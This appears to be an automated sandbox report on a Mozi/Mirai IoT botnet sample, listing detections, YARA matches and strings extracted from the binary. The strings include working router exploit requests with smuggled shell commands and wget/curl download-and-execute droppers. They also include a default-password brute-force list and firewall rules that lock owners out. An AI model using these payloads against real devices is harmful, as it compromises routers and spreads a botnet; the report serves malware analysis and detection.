Linux Analysis Report Mozi.a

Overview

General Information

Sample Name: Mozi.a
Analysis ID: 510721
MD5: e30a81d66f18f07647397d1defbad11b
SHA1: a7fd1a1d71f7f7b00886741db52c42af0c8873f1
SHA256: b7ba5aa2f8f7781d408e87b2131fa2cc9b95cdf3460f9778229398c9e851772a

Detection

Mirai
Score: 92
Range: 0 - 100
Whitelisted: false

Signatures

Antivirus / Scanner detection for submitted sample
Yara detected Mirai
Multi AV Scanner detection for submitted file
Found strings indicative of a multi-platform dropper
Sample contains only a LOAD segment without any section mappings
Yara signature match
Sample contains strings that are potentially command strings
Sample contains strings indicative of password brute-forcing capabilities
Uses the "uname" system call to query kernel version information (possible evasion)
Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable

Analysis Advice

Static ELF header machine description suggests that the sample might only run correctly on MIPS or ARM architectures
All HTTP servers contacted by the sample do not answer. Likely the sample is an old dropper which no longer works
Non-zero exit code suggests an error during the execution. Look up the error code for hints.
Static ELF header machine description suggests that the sample might not execute correctly on this machine

General Information

Joe Sandbox Version: 33.0.0 White Diamond
Analysis ID: 510721
Start date: 28.10.2021
Start time: 06:46:30
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 4m 53s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: Mozi.a
Cookbook file name: defaultlinuxfilecookbook.jbs
Analysis system description: Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode: default
Detection: MAL
Classification: mal92.spre.troj.linA@0/0@0/0
Warnings:
  • VT rate limit hit for: http://%s:%d/Mozi.m;

Process Tree

  • system is lnxubuntu20
  • Mozi.a (PID: 5244, Parent: 5118, MD5: 0083f1f0e77be34ad27f849842bbb00c) Arguments: /tmp/Mozi.a
  • cleanup

Yara Overview

Initial Sample

Source: Mozi.a; Rule: SUSP_ELF_LNX_UPX_Compressed_File; Description: Detects a suspicious ELF binary with UPX compression; Author: Florian Roth
Strings:
  • 0x1fce8:$s1: PROT_EXEC|PROT_WRITE failed.
  • 0x1fd57:$s2: $Id: UPX
  • 0x1fd08:$s3: $Info: This file is packed with the UPX executable packer

Source: Mozi.a; Rule: SUSP_XORed_Mozilla; Description: Detects suspicious XORed keyword - Mozilla/5.0; Author: Florian Roth
Strings:
  • 0x37450:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x374c0:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x37530:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x375a0:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x37610:$xo1: oMXKNNC\x0D\x17\x0C\x12

Source: Mozi.a; Rule: JoeSecurity_Mirai_8; Description: Yara detected Mirai; Author: Joe Security
Source: Mozi.a; Rule: JoeSecurity_Mirai_9; Description: Yara detected Mirai; Author: Joe Security
Source: Mozi.a; Rule: JoeSecurity_Mirai_6; Description: Yara detected Mirai; Author: Joe Security

Memory Dumps

Source: 5244.1.00000000462a18a2.00000000e4311033.r-x.sdmp; Rule: SUSP_ELF_LNX_UPX_Compressed_File; Description: Detects a suspicious ELF binary with UPX compression; Author: Florian Roth
Strings:
  • 0x1fce8:$s1: PROT_EXEC|PROT_WRITE failed.
  • 0x1fd57:$s2: $Id: UPX
  • 0x1fd08:$s3: $Info: This file is packed with the UPX executable packer

Jbx Signature Overview

AV Detection:

Antivirus / Scanner detection for submitted sample
Source: Mozi.a, Avira: detected
Multi AV Scanner detection for submitted file
Source: Mozi.a, Virustotal: Detection: 63%
Source: Mozi.a, Metadefender: Detection: 50%
Source: Mozi.a, ReversingLabs: Detection: 78%

Spreading:

Found strings indicative of a multi-platform dropper
Source: Mozi.a, String: >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/i ||curl -O http://%s:%d/i ||/bin/busybox wget http://%s:%d/i;chmod 777 i ||(cp /bin/ls ii;cat i>ii &&rm i;cp ii i;rm ii);./i;/bin/busybox echo -e '%s'
Source: Mozi.a, String: >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/bin.sh ||curl -O http://%s:%d/bin.sh ||/bin/busybox wget http://%s:%d/bin.sh;chmod 777 bin.sh ||(cp /bin/ls bix.sh;cat bin.sh>bix.sh;rm bin.sh;cp bix.sh bin.sh;rm bix.sh);sh bin.sh %s;/bin/busybox echo -e '%s'
Source: Mozi.a, String: nvalidailedncorrecteniedoodbyebad$ELFshelldvrdvswelcomesuccessmdm96259615-cdpF6connectedBCM#usernamepass>/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/i ||curl -O http://%s:%d/i ||/bin/busybox wget http://%s:%d/i;chmod 777 i ||(cp /bin/ls ii;cat i>ii &&rm i;cp ii i;rm ii);./i;/bin/busybox echo -e '%s'

Source: global traffic, TCP traffic: 192.168.2.23:42836 -> 91.189.91.43:443
Source: global traffic, TCP traffic: 192.168.2.23:42516 -> 109.202.202.202:80
Source: global traffic, TCP traffic: 192.168.2.23:43928 -> 91.189.91.42:443
Source: unknown, Network traffic detected: HTTP traffic on port 43928 -> 443
Source: unknown, Network traffic detected: HTTP traffic on port 42836 -> 443
Source: unknown, TCP traffic detected without corresponding DNS query: 91.189.91.43
Source: unknown, TCP traffic detected without corresponding DNS query: 109.202.202.202
Source: unknown, TCP traffic detected without corresponding DNS query: 91.189.91.42
Source: Mozi.a, String found in binary or memory: http://%s:%d/Mozi.a;chmod
Source: Mozi.a, String found in binary or memory: http://%s:%d/Mozi.a;sh$
Source: Mozi.a, String found in binary or memory: http://%s:%d/Mozi.m
Source: Mozi.a, String found in binary or memory: http://%s:%d/Mozi.m;
Source: Mozi.a, String found in binary or memory: http://%s:%d/Mozi.m;$
Source: Mozi.a, String found in binary or memory: http://%s:%d/Mozi.m;/tmp/Mozi.m
Source: Mozi.a, String found in binary or memory: http://%s:%d/bin.sh
Source: Mozi.a, String found in binary or memory: http://%s:%d/bin.sh;chmod
Source: Mozi.a, String found in binary or memory: http://127.0.0.1
Source: Mozi.a, String found in binary or memory: http://127.0.0.1sendcmd
Source: Mozi.a, String found in binary or memory: http://HTTP/1.1
Source: Mozi.a, String found in binary or memory: http://baidu.com/%s/%s/%d/%s/%s/%s/%s)
Source: Mozi.a, String found in binary or memory: http://ipinfo.io/ip
Source: Mozi.a, String found in binary or memory: http://purenetworks.com/HNAP1/
Source: Mozi.a, String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: Mozi.a, String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
Source: Mozi.a, String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope//
Source: Mozi.a, 5244.1.00000000462a18a2.00000000e4311033.r-x.sdmp, String found in binary or memory: http://upx.sf.net
Sample contains only a LOAD segment without any section mappings
Source: LOAD without section mappings, Program segment: 0x400000
Yara signature match
Source: Mozi.a, type: SAMPLE, Matched rule: SUSP_ELF_LNX_UPX_Compressed_File date = 2018-12-12, author = Florian Roth, description = Detects a suspicious ELF binary with UPX compression, reference = Internal Research, score = 038ff8b2fef16f8ee9d70e6c219c5f380afe1a21761791e8cbda21fa4d09fdb4
Source: Mozi.a, type: SAMPLE, Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
Source: 5244.1.00000000462a18a2.00000000e4311033.r-x.sdmp, type: MEMORY, Matched rule: SUSP_ELF_LNX_UPX_Compressed_File date = 2018-12-12, author = Florian Roth, description = Detects a suspicious ELF binary with UPX compression, reference = Internal Research, score = 038ff8b2fef16f8ee9d70e6c219c5f380afe1a21761791e8cbda21fa4d09fdb4
Sample contains strings that are potentially command strings
Source: Initial sample, Potential command found: POST /cdn-cgi/
Source: Initial sample, Potential command found: GET /c HTTP/1.0
Source: Initial sample, Potential command found: POST /cdn-cgi/ HTTP/1.1
Source: Initial sample, Potential command found: GET %s HTTP/1.1
Source: Initial sample, Potential command found: iptables -I INPUT -p tcp --destination-port 35000 -j DROP
Source: Initial sample, Potential command found: iptables -I INPUT -p tcp --destination-port 50023 -j DROP
Source: Initial sample, Potential command found: iptables -I OUTPUT -p tcp --source-port 50023 -j DROP
Source: Initial sample, Potential command found: iptables -I OUTPUT -p tcp --source-port 35000 -j DROP
Source: Initial sample, Potential command found: iptables -I INPUT -p tcp --destination-port 7547 -j DROP
Source: Initial sample, Potential command found: iptables -I OUTPUT -p tcp --source-port 7547 -j DROP
Source: Initial sample, Potential command found: iptables -I INPUT -p tcp --dport 35000 -j DROP
Source: Initial sample, Potential command found: iptables -I INPUT -p tcp --dport 50023 -j DROP
Source: Initial sample, Potential command found: iptables -I OUTPUT -p tcp --sport 50023 -j DROP
Source: Initial sample, Potential command found: iptables -I OUTPUT -p tcp --sport 35000 -j DROP
Source: Initial sample, Potential command found: iptables -I INPUT -p tcp --dport 7547 -j DROP
Source: Initial sample, Potential command found: iptables -I OUTPUT -p tcp --sport 7547 -j DROP
Source: Initial sample, Potential command found: iptables -I INPUT -p tcp --destination-port 58000 -j DROP
Source: Initial sample, Potential command found: iptables -I OUTPUT -p tcp --source-port 58000 -j DROP
Source: Initial sample, Potential command found: iptables -I INPUT -p tcp --dport 58000 -j DROP
Source: Initial sample, Potential command found: iptables -I OUTPUT -p tcp --sport 58000 -j DROP
Source: Initial sample, Potential command found: rm /home/httpd/web_shell_cmd.gch
Source: Initial sample, Potential command found: echo 3 > /usr/local/ct/ctadmincfg
Source: Initial sample, Potential command found: mount -o remount,rw /overlay /
Source: Initial sample, Potential command found: mv -f %s %s
Source: Initial sample, Potential command found: iptables -I INPUT -p udp --destination-port %d -j ACCEPT
Source: Initial sample, Potential command found: iptables -I OUTPUT -p udp --source-port %d -j ACCEPT
Source: Initial sample, Potential command found: iptables -I PREROUTING -t nat -p udp --destination-port %d -j ACCEPT
Source: Initial sample, Potential command found: iptables -I POSTROUTING -t nat -p udp --source-port %d -j ACCEPT
Source: Initial sample, Potential command found: iptables -I INPUT -p udp --dport %d -j ACCEPT
Source: Initial sample, Potential command found: iptables -I OUTPUT -p udp --sport %d -j ACCEPT
Source: Initial sample, Potential command found: iptables -I PREROUTING -t nat -p udp --dport %d -j ACCEPT
Source: Initial sample, Potential command found: iptables -I POSTROUTING -t nat -p udp --sport %d -j ACCEPT
Source: Initial sample, Potential command found: GET /c
Source: Initial sample, Potential command found: iptables -I INPUT -p tcp --destination-port %d -j ACCEPT
Source: Initial sample, Potential command found: iptables -I OUTPUT -p tcp --source-port %d -j ACCEPT
Source: Initial sample, Potential command found: iptables -I PREROUTING -t nat -p tcp --destination-port %d -j ACCEPT
Source: Initial sample, Potential command found: iptables -I POSTROUTING -t nat -p tcp --source-port %d -j ACCEPT
Source: Initial sample, Potential command found: iptables -I INPUT -p tcp --dport %d -j ACCEPT
Source: Initial sample, Potential command found: iptables -I OUTPUT -p tcp --sport %d -j ACCEPT
Source: Initial sample, Potential command found: iptables -I PREROUTING -t nat -p tcp --dport %d -j ACCEPT
Source: Initial sample, Potential command found: iptables -I POSTROUTING -t nat -p tcp --sport %d -j ACCEPT
Source: Initial sample, Potential command found: killall -9 %s
Source: Initial sample, Potential command found: iptables -I INPUT -p tcp --destination-port 22 -j DROP
Source: Initial sample, Potential command found: iptables -I INPUT -p tcp --destination-port 23 -j DROP
Source: Initial sample, Potential command found: iptables -I INPUT -p tcp --destination-port 2323 -j DROP
Source: Initial sample, Potential command found: iptables -I OUTPUT -p tcp --source-port 22 -j DROP
Source: Initial sample, Potential command found: iptables -I OUTPUT -p tcp --source-port 23 -j DROP
Source: Initial sample, Potential command found: iptables -I OUTPUT -p tcp --source-port 2323 -j DROP
Source: Initial sample, Potential command found: iptables -I INPUT -p tcp --dport 22 -j DROP
Source: Initial sample, Potential command found: iptables -I INPUT -p tcp --dport 23 -j DROP
Source: Initial sample, Potential command found: iptables -I INPUT -p tcp --dport 2323 -j DROP
Source: Initial sample, Potential command found: iptables -I OUTPUT -p tcp --sport 22 -j DROP
Source: Initial sample, Potential command found: iptables -I OUTPUT -p tcp --sport 23 -j DROP
Source: Initial sample, Potential command found: iptables -I OUTPUT -p tcp --sport 2323 -j DROP
Source: Initial sample, Potential command found: killall -9 telnetd utelnetd scfgmgr
Source: Initial sample, Potential command found: dd bs=52 count=1 if=/bin/ls || cat /bin/ls || while read i; do echo $i; done < /bin/ls || while read i; do echo $i; done < /bin/busybox
Source: Initial sample, Potential command found: GET /Mozi.6 HTTP/1.0
Source: Initial sample, Potential command found: GET /Mozi.7 HTTP/1.0
Source: Initial sample, Potential command found: GET /Mozi.c HTTP/1.0
Source: Initial sample, Potential command found: GET /Mozi.m HTTP/1.0
Source: Initial sample, Potential command found: GET /Mozi.x HTTP/1.0
Source: Initial sample, Potential command found: GET /Mozi.a HTTP/1.0
Source: Initial sample, Potential command found: GET /Mozi.s HTTP/1.0
Source: Initial sample, Potential command found: GET /Mozi.r HTTP/1.0
Source: Initial sample, Potential command found: GET /Mozi.b HTTP/1.0
Source: Initial sample, Potential command found: GET /Mozi.4 HTTP/1.0
Source: Initial sample, Potential command found: GET /Mozi.k HTTP/1.0
Source: Initial sample, Potential command found: GET /Mozi.l HTTP/1.0
Source: Initial sample, Potential command found: GET /Mozi.p HTTP/1.0
Source: Initial sample, Potential command found: GET /%s HTTP/1.1
Source: Initial sample, Potential command found: POST /%s HTTP/1.1
Source: Initial sample, Potential command found: POST /GponForm/diag_Form?images/ HTTP/1.1
Source: Initial sample, Potential command found: POST /picsdesc.xml HTTP/1.1
Source: Initial sample, Potential command found: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://%s:%d/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: Initial sample, Potential command found: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1
Source: Initial sample, Potential command found: POST /UD/act?1 HTTP/1.1
Source: Initial sample, Potential command found: POST /HNAP1/ HTTP/1.0
Source: Initial sample, Potential command found: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://%s:%d/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
Source: Initial sample, Potential command found: GET /shell?cd+/tmp;rm+-rf+*;wget+http://%s:%d/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1
Source: Initial sample, Potential command found: POST /soap.cgi?service=WANIPConn1 HTTP/1.1
Source: Initial sample, Potential command found: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://%s:%d/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.m
Source: Initial sample, Potential command found: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://%s:%d/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcron
Sample contains strings indicative of password brute-forcing capabilities
Source: Initial sample, String containing potential weak password found: admin
Source: Initial sample, String containing potential weak password found: default
Source: Initial sample, String containing potential weak password found: support
Source: Initial sample, String containing potential weak password found: service
Source: Initial sample, String containing potential weak password found: supervisor
Source: Initial sample, String containing potential weak password found: guest
Source: Initial sample, String containing potential weak password found: administrator
Source: Initial sample, String containing potential weak password found: 123456
Source: Initial sample, String containing potential weak password found: 54321
Source: Initial sample, String containing potential weak password found: password
Source: Initial sample, String containing potential weak password found: 12345
Source: Initial sample, String containing potential weak password found: admin1234
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Source: Initial sample, String containing 'busybox' found: busybox
Source: Initial sample, String containing 'busybox' found: ..%s/%s/proc/haha/tmp/var/lib/dev/syscfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer URL "http://127.0.0.1"cfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer ConnectionRequestPassword "acsMozi"iptables -I INPUT -p tcp --destination-port 35000 -j DROPiptables -I INPUT -p tcp --destination-port 50023 -j DROPiptables -I OUTPUT -p tcp --source-port 50023 -j DROPiptables -I OUTPUT -p tcp --source-port 35000 -j DROPiptables -I INPUT -p tcp --destination-port 7547 -j DROPiptables -I OUTPUT -p tcp --source-port 7547 -j DROPiptables -I INPUT -p tcp --dport 35000 -j DROPiptables -I INPUT -p tcp --dport 50023 -j DROPiptables -I OUTPUT -p tcp --sport 50023 -j DROPiptables -I OUTPUT -p tcp --sport 35000 -j DROPiptables -I INPUT -p tcp --dport 7547 -j DROPiptables -I OUTPUT -p tcp --sport 7547 -j DROP/mnt/jffs2/Equip.sh%s%s%s%s#!/bin/sh/mnt/jffs2/wifi.sh/mnt/jffs2/WifiPerformance.shbusybox%255s %255s %255s %255s
Source: Initial sample, String containing 'busybox' found: /bin/busybox cat /bin/ls|head -n 1
Source: Initial sample, String containing 'busybox' found: /bin/busybox hexdump -e '16/1 "%c"' -n 52 /bin/ls
Source: Initial sample, String containing 'busybox' found: /bin/busybox cat /bin/ls|more
Source: Initial sample, String containing 'busybox' found: "\x%02xsage:/bin/busybox cat /bin/ls|head -n 1
Source: Initial sample, String containing 'busybox' found: dd bs=52 count=1 if=/bin/ls || cat /bin/ls || while read i; do echo $i; done < /bin/ls || while read i; do echo $i; done < /bin/busybox
Source: Initial sample, String containing 'busybox' found: /bin/busybox dd bs=52 count=1 if=/bin/ls || /bin/busybox cat /bin/ls || while read i; do printf $i; done < /bin/ls || while read i; do printf $i; done < /bin/busybox
Source: Initial sample, String containing 'busybox' found: /bin/busybox chmod 777 .i || (cp /bin/ls .j && cat .i>.j &&rm .i && cp .j .i &&rm .j)
Source: Initial sample, String containing 'busybox' found: /bin/busybox echo -ne '%s' %s .i; %s && /bin/busybox echo -en '%s'
Source: Initial sample, String containing 'busybox' found: /bin/busybox echo '%s' %s .i; %s && /bin/busybox echo '%s'
Source: Initial sample, String containing 'busybox' found: ./.i %d %d %d %d %d;./Runn;/bin/busybox echo -e '%s'
Source: Initial sample, String containing 'busybox' found: >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/i ||curl -O http://%s:%d/i ||/bin/busybox wget http://%s:%d/i;chmod 777 i ||(cp /bin/ls ii;cat i>ii &&rm i;cp ii i;rm ii);./i;/bin/busybox echo -e '%s'
Source: Initial sample, String containing 'busybox' found: >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/bin.sh ||curl -O http://%s:%d/bin.sh ||/bin/busybox wget http://%s:%d/bin.sh;chmod 777 bin.sh ||(cp /bin/ls bix.sh;cat bin.sh>bix.sh;rm bin.sh;cp bix.sh bin.sh;rm bix.sh);sh bin.sh %s;/bin/busybox echo -e '%s'
Source: Initial sample, String containing 'busybox' found: >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;/bin/busybox echo -e '%s'
Source: Initial sample, String containing 'busybox' found: /bin/busybox wget;/bin/busybox echo -ne '%s'
Source: Initial sample, String containing 'busybox' found: ELF.r.c.x.k.p.s.6.m.l.4>>/bin/busybox chmod 777 .i || (cp /bin/ls .j && cat .i>.j &&rm .i && cp .j .i &&rm .j)>.x/bin/busybox echo -ne '%s' %s .i; %s && /bin/busybox echo -en '%s'
Source: Initial sample, String containing 'busybox' found: me./.i %d %d %d %d %d;./Runn;/bin/busybox echo -e '%s'
Source: Initial sample, String containing 'busybox' found: nvalidailedncorrecteniedoodbyebad$ELFshelldvrdvswelcomesuccessmdm96259615-cdpF6connectedBCM#usernamepass>/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/i ||curl -O http://%s:%d/i ||/bin/busybox wget http://%s:%d/i;chmod 777 i ||(cp /bin/ls ii;cat i>ii &&rm i;cp ii i;rm ii);./i;/bin/busybox echo -e '%s'
Source: Initial sample, String containing 'busybox' found: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g %s:%d -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: Initial sample, String containing 'busybox' found: <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><SOAP-ENV:Body><u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"><NewNTPServer1>`cd /tmp && rm -rf * && /bin/busybox wget http://%s:%d/Mozi.m && chmod 777 /tmp/tr064 && /tmp/tr064 tr064`</NewNTPServer1><NewNTPServer2>`echo DEATH`</NewNTPServer2><NewNTPServer3>`echo DEATH`</NewNTPServer3><NewNTPServer4>`echo DEATH`</NewNTPServer4><NewNTPServer5>`echo DEATH`</NewNTPServer5></u:SetNTPServers></SOAP-ENV:Body></SOAP-ENV:Envelope>
Source: classification engine, Classification label: mal92.spre.troj.linA@0/0@0/0
Source: Mozi.a, Joe Sandbox Cloud Basic: Detection: clean Score: 0
Uses the "uname" system call to query kernel version information (possible evasion)
Source: /tmp/Mozi.a (PID: 5244), Queries kernel information via 'uname'
Source: Mozi.a, 5244.1.000000004f8eb38e.0000000028a15c7e.rw-.sdmp, Binary or memory string: /etc/qemu-binfmt/mips
Source: Mozi.a, 5244.1.00000000b89dae2d.00000000a566f1aa.rw-.sdmp, Binary or memory string: /usr/bin/qemu-mips
Source: Mozi.a, 5244.1.000000004f8eb38e.0000000028a15c7e.rw-.sdmp, Binary or memory string: UV!/etc/qemu-binfmt/mips
Source: Mozi.a, 5244.1.00000000b89dae2d.00000000a566f1aa.rw-.sdmp, Binary or memory string: x86_64/usr/bin/qemu-mips/tmp/Mozi.aSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/Mozi.a
Source: Mozi.a, 5244.1.00000000b89dae2d.00000000a566f1aa.rw-.sdmp, Binary or memory string: qemu: uncaught target signal 5 (Trace/breakpoint trap) - core dumped

Stealing of Sensitive Information:

Yara detected Mirai
Source: Yara match, File source: Mozi.a, type: SAMPLE

Remote Access Functionality:

Yara detected Mirai
Source: Yara match, File source: Mozi.a, type: SAMPLE

Mitre Att&ck Matrix

Techniques per tactic (a trailing number is the count shown in the matrix cell):
  • Initial Access: Valid Accounts; Default Accounts
  • Execution: Command and Scripting Interpreter (1); Scripting (1)
  • Persistence: Path Interception; Boot or Logon Initialization Scripts
  • Privilege Escalation: Path Interception; Boot or Logon Initialization Scripts
  • Defense Evasion: Scripting (1); Rootkit
  • Credential Access: Brute Force (1); LSASS Memory
  • Discovery: Security Software Discovery (11); Application Window Discovery
  • Lateral Movement: Remote Services; Remote Desktop Protocol
  • Collection: Data from Local System; Data from Removable Media
  • Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth
  • Command and Control: Encrypted Channel (1); Application Layer Protocol (1)
  • Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS
  • Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization
  • Impact: Modify System Partition; Device Lockout

Malware Configuration

No configs have been found

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source: Mozi.a
  • Virustotal: 64%
  • Metadefender: 50%
  • ReversingLabs: 79% (label: Linux.Trojan.Mirai)
  • Avira: 100% (label: LINUX/Mirai.oreox)

Dropped Files

No Antivirus matches

Domains

No Antivirus matches

URLs

  • http://%s:%d/bin.sh;chmod: 0% (Avira URL Cloud, safe)
  • http://%s:%d/Mozi.a;chmod: 0% (Avira URL Cloud, safe)
  • http://%s:%d/Mozi.m;/tmp/Mozi.m: 0% (Avira URL Cloud, safe)
  • http://%s:%d/bin.sh: 0% (Avira URL Cloud, safe)
  • http://purenetworks.com/HNAP1/: 0% (URL Reputation, safe)
  • http://%s:%d/Mozi.m;: 0% (Avira URL Cloud, safe)
  • http://%s:%d/Mozi.m;$: 0% (Avira URL Cloud, safe)
  • http://HTTP/1.1: 0% (Avira URL Cloud, safe)
  • http://%s:%d/Mozi.a;sh$: 0% (Avira URL Cloud, safe)
  • http://127.0.0.1: 0% (Avira URL Cloud, safe)
  • http://%s:%d/Mozi.m: 0% (Avira URL Cloud, safe)
  • http://127.0.0.1sendcmd: 0% (Avira URL Cloud, safe)

Domains and IPs

Contacted Domains

No contacted domains info

URLs from Memory and Binaries

Name (Source): Malicious; Antivirus Detection; Reputation
  • http://%s:%d/bin.sh;chmod (Mozi.a): true; Avira URL Cloud: safe; low
  • http://ipinfo.io/ip (Mozi.a): false; high
  • http://%s:%d/Mozi.a;chmod (Mozi.a): true; Avira URL Cloud: safe; low
  • http://%s:%d/Mozi.m;/tmp/Mozi.m (Mozi.a): false; Avira URL Cloud: safe; low
  • http://schemas.xmlsoap.org/soap/encoding/ (Mozi.a): false; high
  • http://%s:%d/bin.sh (Mozi.a): true; Avira URL Cloud: safe; low
  • http://purenetworks.com/HNAP1/ (Mozi.a): false; URL Reputation: safe; unknown
  • http://%s:%d/Mozi.m; (Mozi.a): false; Avira URL Cloud: safe; low
  • http://%s:%d/Mozi.m;$ (Mozi.a): false; Avira URL Cloud: safe; low
  • http://schemas.xmlsoap.org/soap/envelope/ (Mozi.a): false; high
  • http://upx.sf.net (Mozi.a, 5244.1.00000000462a18a2.00000000e4311033.r-x.sdmp): false; high
  • http://HTTP/1.1 (Mozi.a): false; Avira URL Cloud: safe; low
  • http://%s:%d/Mozi.a;sh$ (Mozi.a): true; Avira URL Cloud: safe; low
  • http://127.0.0.1 (Mozi.a): false; Avira URL Cloud: safe; unknown
  • http://baidu.com/%s/%s/%d/%s/%s/%s/%s) (Mozi.a): false; high
  • http://schemas.xmlsoap.org/soap/envelope// (Mozi.a): false; high
  • http://%s:%d/Mozi.m (Mozi.a): false; Avira URL Cloud: safe; low
  • http://127.0.0.1sendcmd (Mozi.a): false; Avira URL Cloud: safe; low

Contacted IPs

Public

IP; Domain; Country; ASN (ASN Name, country code); Malicious
  • 109.202.202.202; unknown; Switzerland; 13030 (INIT7, CH); false
  • 91.189.91.43; unknown; United Kingdom; 41231 (CANONICAL-AS, GB); false
  • 91.189.91.42; unknown; United Kingdom; 41231 (CANONICAL-AS, GB); false


Runtime Messages

Command: /tmp/Mozi.a
Exit Code: 133
Exit Code Info: 133 = 128 + 5, i.e. the process was terminated by signal 5 (SIGTRAP), matching the qemu message in standard error
Killed: False
Standard Output:

Standard Error: qemu: uncaught target signal 5 (Trace/breakpoint trap) - core dumped

Joe Sandbox View / Context

IPs
                                                                                                hZt4RvNpGTGet hashmaliciousBrowse
                                                                                                  nCEHDEKsvvGet hashmaliciousBrowse
                                                                                                    91.189.91.42ggbMKQDdG2Get hashmaliciousBrowse
                                                                                                      SecuriteInfo.com.Linux.Siggen.4218.31606.9155Get hashmaliciousBrowse
                                                                                                        AbriuSDkeLGet hashmaliciousBrowse
                                                                                                          xjmPNreY8IGet hashmaliciousBrowse
                                                                                                            u7kjf23xQcGet hashmaliciousBrowse
                                                                                                              nrT4coM180Get hashmaliciousBrowse
                                                                                                                Fy8SpcfH79Get hashmaliciousBrowse
                                                                                                                  6vqWv6BFhRGet hashmaliciousBrowse
                                                                                                                    WaH4Q4OTzDGet hashmaliciousBrowse
                                                                                                                      6s4RqypN8pGet hashmaliciousBrowse
                                                                                                                        0vknf5ybYdGet hashmaliciousBrowse
                                                                                                                          sddX6YllruGet hashmaliciousBrowse
                                                                                                                            8NC2CO6W0BGet hashmaliciousBrowse
                                                                                                                              nEzZe0JYXLGet hashmaliciousBrowse
                                                                                                                                D3xbHFJTICGet hashmaliciousBrowse
                                                                                                                                  ivgMZPUOLxGet hashmaliciousBrowse
